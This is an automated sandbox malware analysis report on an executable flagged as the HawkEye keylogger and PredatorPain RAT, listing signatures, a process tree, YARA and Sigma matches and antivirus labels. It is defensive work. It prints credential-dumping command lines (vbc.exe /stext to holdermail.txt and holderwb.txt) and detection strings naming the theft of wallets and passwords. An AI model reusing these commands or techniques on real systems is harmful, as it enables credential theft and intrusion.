
Windows Analysis Report aaVb1xEmrd

Overview

General Information

Sample Name: aaVb1xEmrd (renamed file extension from none to exe)
Analysis ID: 478309
MD5: c428b176eca6b17cda3f5729abaddf0b
SHA1: 65262ee5ea9c832436c6eba4a5e58d69900aea72
SHA256: b139dd73d811c0d20602ebd74f962724d2c9e31958bdea9326473bf4bbd746b9
Tags: exe, HawkEye

Detection

HawkEye, MailPassView, PredatorPainRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MailPassView
Yara detected HawkEye Keylogger
Yara detected PredatorPainRAT
System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Detected HawkEye Rat
Multi AV Scanner detection for dropped file
Sigma detected: System File Execution Location Anomaly
Creates multiple autostart registry keys
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Tries to steal Mail credentials (via file access)
Drops PE files with benign system names
Sample uses process hollowing technique
Installs a global keyboard hook
Disables Windows system restore
Writes to foreign memory regions
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Changes the view of files in windows explorer (hidden files and folders)
Yara detected WebBrowserPassView password recovery tool
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Sigma detected: PowerShell Script Run in AppData
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
May infect USB drives
Found potential string decryption / allocating functions
Contains functionality to call native functions
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Contains functionality to query network adapater information
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • aaVb1xEmrd.exe (PID: 2432 cmdline: 'C:\Users\user\Desktop\aaVb1xEmrd.exe' MD5: C428B176ECA6B17CDA3F5729ABADDF0B)
    • MULTIBOT_NEWW.exe (PID: 4768 cmdline: 'C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe' MD5: 3F620FFD8BE649D1D31AB54F73A559BE)
    • svchost.exe (PID: 4280 cmdline: 'C:\Users\user\AppData\Local\Temp\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
      • svchost.exe (PID: 6256 cmdline: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
    • taskhost.exe (PID: 4548 cmdline: 'C:\Users\user\AppData\Local\Temp\taskhost.exe' MD5: 83827B8CFFE67A789B03E342ED3B1572)
      • dw20.exe (PID: 6148 cmdline: dw20.exe -x -s 2200 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
      • vbc.exe (PID: 6280 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 6612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • vbc.exe (PID: 6292 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 6624 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 176 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • iExplorer.exe (PID: 1352 cmdline: 'C:\Users\user\AppData\Local\Temp\iExplorer.exe' MD5: A0DBD1314D214588960B1E0BCED5F4E0)
      • Windows Update.exe (PID: 5204 cmdline: 'C:\Users\user\AppData\Roaming\Windows Update.exe' MD5: A0DBD1314D214588960B1E0BCED5F4E0)
        • dw20.exe (PID: 6724 cmdline: dw20.exe -x -s 2324 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
        • vbc.exe (PID: 6912 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • vbc.exe (PID: 6928 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
        • WerFault.exe (PID: 5276 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • WerFault.exe (PID: 5200 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2336 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6740 cmdline: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
  • svchost.exe (PID: 6960 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7088 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4920 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • WindowsUpdate.exe (PID: 6112 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: 83827B8CFFE67A789B03E342ED3B1572)
    • dw20.exe (PID: 4068 cmdline: dw20.exe -x -s 1168 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
  • svchost.exe (PID: 3396 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6376 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6468 cmdline: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
  • WindowsUpdate.exe (PID: 6656 cmdline: 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe' MD5: 83827B8CFFE67A789B03E342ED3B1572)
    • dw20.exe (PID: 7084 cmdline: dw20.exe -x -s 1096 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
  • svchost.exe (PID: 1752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5168 cmdline: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe' MD5: A273A781070D239BA99D3FD8EF341E6C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author (matched strings are listed beneath each row)
C:\Users\user\AppData\Roaming\Windows Update.exe | RAT_PredatorPain | Detects PredatorPain RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x7b7df:$string1: holderwb.txt
  • 0x7b7fb:$string1: holderwb.txt
  • 0x7b961:$string3: There is a file attached to this email
  • 0x7bf35:$string4: screens\screenshot
  • 0x7a364:$string5: Disablelogger
  • 0x7a30e:$string6: \pidloc.txt
  • 0x79e1c:$string7: clearie
  • 0x79e34:$string8: clearff
  • 0x7a5c5:$string9: emails should be sent to you shortly
  • 0x7aad9:$string11: open=Sys.exe
  • 0x7a326:$ver1: PredatorLogger
  • 0x7a9a8:$ver3: Predator Pain
  • 0x7b79b:$ver3: Predator Pain
  • 0x7b910:$ver3: Predator Pain
  • 0x7bb27:$ver3: Predator Pain
C:\Users\user\AppData\Roaming\Windows Update.exe | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x615f:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
C:\Users\user\AppData\Roaming\Windows Update.exe | JoeSecurity_PredatorPainRAT | Yara detected PredatorPainRAT | Kevin Breen <kevin@techanarchy.net>
C:\Users\user\AppData\Roaming\Windows Update.exe | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
C:\Users\user\AppData\Roaming\Windows Update.exe | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
(19 entries in total; only the first five are shown here)

Memory Dumps

Source | Rule | Description | Author (matched strings are listed beneath each row)
00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x7b68e:$key: HawkEyeKeylogger
  • 0x7d8e0:$salt: 099u787978786
  • 0x7bcdd:$string1: HawkEye_Keylogger
  • 0x7cb30:$string1: HawkEye_Keylogger
  • 0x7d840:$string1: HawkEye_Keylogger
  • 0x7c0c6:$string2: holdermail.txt
  • 0x7c0e6:$string2: holdermail.txt
  • 0x7c008:$string3: wallet.dat
  • 0x7c020:$string3: wallet.dat
  • 0x7c036:$string3: wallet.dat
  • 0x7d422:$string4: Keylog Records
  • 0x7d73a:$string4: Keylog Records
  • 0x7d938:$string5: do not script -->
  • 0x7b676:$string6: \pidloc.txt
  • 0x7b704:$string7: BSPLIT
  • 0x7b714:$string7: BSPLIT
00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp | Hawkeye | detect HawkEye in memory | JPCERT/CC Incident Response Group
  • 0x7bd35:$hawkstr1: HawkEye Keylogger
  • 0x7cb76:$hawkstr1: HawkEye Keylogger
  • 0x7cea5:$hawkstr1: HawkEye Keylogger
  • 0x7d000:$hawkstr1: HawkEye Keylogger
  • 0x7d163:$hawkstr1: HawkEye Keylogger
  • 0x7d3fa:$hawkstr1: HawkEye Keylogger
  • 0x7b8c3:$hawkstr2: Dear HawkEye Customers!
  • 0x7cef8:$hawkstr2: Dear HawkEye Customers!
  • 0x7d04f:$hawkstr2: Dear HawkEye Customers!
  • 0x7d1b6:$hawkstr2: Dear HawkEye Customers!
  • 0x7b9e4:$hawkstr3: HawkEye Logger Details:
(65 entries in total; only the first five are shown here)

Unpacked PEs

Source | Rule | Description | Author (matched strings are listed beneath each row)
8.0.Windows Update.exe.3d0000.10.unpack | RAT_PredatorPain | Detects PredatorPain RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x7b7df:$string1: holderwb.txt
  • 0x7b7fb:$string1: holderwb.txt
  • 0x7b961:$string3: There is a file attached to this email
  • 0x7bf35:$string4: screens\screenshot
  • 0x7a364:$string5: Disablelogger
  • 0x7a30e:$string6: \pidloc.txt
  • 0x79e1c:$string7: clearie
  • 0x79e34:$string8: clearff
  • 0x7a5c5:$string9: emails should be sent to you shortly
  • 0x7aad9:$string11: open=Sys.exe
  • 0x7a326:$ver1: PredatorLogger
  • 0x7a9a8:$ver3: Predator Pain
  • 0x7b79b:$ver3: Predator Pain
  • 0x7b910:$ver3: Predator Pain
  • 0x7bb27:$ver3: Predator Pain
8.0.Windows Update.exe.3d0000.10.unpack | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x615f:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
8.0.Windows Update.exe.3d0000.10.unpack | JoeSecurity_PredatorPainRAT | Yara detected PredatorPainRAT | Kevin Breen <kevin@techanarchy.net>
8.0.Windows Update.exe.3d0000.10.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
8.0.Windows Update.exe.3d0000.10.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
(206 entries in total; only the first five are shown here)

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly
Source: Process started; Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community; Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe', CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe', CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\aaVb1xEmrd.exe', ParentImage: C:\Users\user\Desktop\aaVb1xEmrd.exe, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe', ProcessId: 4280
Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe', CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe', CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\aaVb1xEmrd.exe', ParentImage: C:\Users\user\Desktop\aaVb1xEmrd.exe, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe', ProcessId: 4280
Sigma detected: PowerShell Script Run in AppData
Source: Process started; Author: Florian Roth, Jonhnathan Ribeiro, oscd.community; Data: Command: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe', CommandLine: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe', CommandLine|base64offset|contains: , Image: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe, NewProcessName: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe, OriginalFileName: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe', ParentImage: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentProcessId: 4280, ProcessCommandLine: 'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe', ProcessId: 6256
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: 'C:\Users\user\AppData\Local\Temp\svchost.exe', CommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe', CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\aaVb1xEmrd.exe', ParentImage: C:\Users\user\Desktop\aaVb1xEmrd.exe, ParentProcessId: 2432, ProcessCommandLine: 'C:\Users\user\AppData\Local\Temp\svchost.exe', ProcessId: 4280

Jbx Signature Overview


AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exe; Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe; Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe; Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; Avira: detection malicious, Label: TR/Spy.Gen
Multi AV Scanner detection for submitted file
Source: aaVb1xEmrd.exe; Virustotal: Detection: 69%
Source: aaVb1xEmrd.exe; Metadefender: Detection: 28%
Source: aaVb1xEmrd.exe; ReversingLabs: Detection: 74%
Antivirus / Scanner detection for submitted sample
Source: aaVb1xEmrd.exe; Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; Metadefender: Detection: 60%
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; ReversingLabs: Detection: 85%
Machine Learning detection for sample
Source: aaVb1xEmrd.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows Firewall\WIN32.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe; Joe Sandbox ML: detected
Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; Joe Sandbox ML: detected
Source: 7.2.iExplorer.exe.6d0000.0.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 7.2.iExplorer.exe.6d0000.0.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: 5.0.taskhost.exe.9c0000.0.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 5.0.taskhost.exe.9c0000.0.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: 10.0.svchost.exe.bc0000.0.unpack; Avira: Label: TR/Spy.Gen
Source: 8.0.Windows Update.exe.3d0000.4.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 8.0.Windows Update.exe.3d0000.4.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: 8.0.Windows Update.exe.3d0000.10.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 8.0.Windows Update.exe.3d0000.10.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: 7.0.iExplorer.exe.6d0000.0.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 7.0.iExplorer.exe.6d0000.0.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: 4.0.svchost.exe.f30000.0.unpack; Avira: Label: TR/Spy.Gen
Source: 19.0.svchost.exe.320000.0.unpack; Avira: Label: TR/Spy.Gen
Source: 5.2.taskhost.exe.9c0000.0.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 5.2.taskhost.exe.9c0000.0.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: 8.0.Windows Update.exe.3d0000.0.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 8.0.Windows Update.exe.3d0000.0.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: 8.2.Windows Update.exe.3d0000.0.unpack; Avira: Label: TR/AD.MExecute.lzrac
Source: 8.2.Windows Update.exe.3d0000.0.unpack; Avira: Label: SPR/Tool.MailPassView.473
Source: aaVb1xEmrd.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\SYSTEM32\winnlsres.dlls.pdb source: svchost.exe, 0000000A.00000002.490336011.00000000010A9000.00000004.00000001.sdmp
Source: Binary string: symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
Source: Binary string: System.Windows.Forms.pdb5c5619 source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe
Source: Binary string: mscorlib.pdbndows Update.exe source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbd source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
Source: Binary string: rlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: svchost.exe, 0000000A.00000002.491122955.0000000001513000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
Source: Binary string: 1?pC:\Windows\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Windows.Forms.pdbl source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe
Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: taskhost.exe, iExplorer.exe, Windows Update.exe, vbc.exe, 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmp
Source: Binary string: ws\System.Windows.Forms.pdbpdbrms.pdb source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb.p source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\System.Windows.Forms.pdbsys source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 00000008.00000000.277693996.0000000000A27000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbH source: Windows Update.exe, 00000008.00000000.287657799.0000000008F0A000.00000004.00000001.sdmp
Source: Binary string: kC:\Windows\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000A.00000002.491098692.0000000001502000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb source: svchost.exe, 0000000A.00000002.491122955.0000000001513000.00000004.00000001.sdmp
Source: taskhost.exe; Binary or memory string: [autorun]
Source: taskhost.exe; Binary or memory string: autorun.inf
Source: iExplorer.exe; Binary or memory string: [autorun]
Source: iExplorer.exe; Binary or memory string: autorun.inf
Source: Windows Update.exe; Binary or memory string: [autorun]
Source: Windows Update.exe; Binary or memory string: autorun.inf
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\ty34t43t4t4te45634\CureMe\
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\gtry6wy5u54w64get63r3\ty34t43t4t4te45634\
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; File opened: C:\Vaccine\4535425425342grt45454s5s4\tg43gey4wk5l4jw56k34j5l4kjlsw56jkwl6j\gtrewt543w5j4hktjh4lk5qlktresty3\
Source: C:\Users\user\AppData\Local\Temp\svchost.exe; File opened: C:\Vaccine\4535425425342grt45454s5s4\
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Code function: 1_2_00405C6C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose, 1_2_00405C6C
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Code function: 1_2_004052DC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_004052DC
Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Code function: 1_2_004026B9 FindFirstFileA, 1_2_004026B9
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h] 5_2_052077F0
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_05200728
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_0520A32E
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_05206711
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_05205B73
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then call 05201B20h 5_2_05208D5F
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_05208D5F
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_05209BA1
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then jmp 05201A73h 5_2_052019A3
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then jmp 05201A73h 5_2_052019B0
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then call 05201B20h 5_2_05209596
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_05209596
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-08h] 5_2_052077EB
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 5_2_052017F8
Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 4x nop then mov esp, ebp 5_2_0520483B
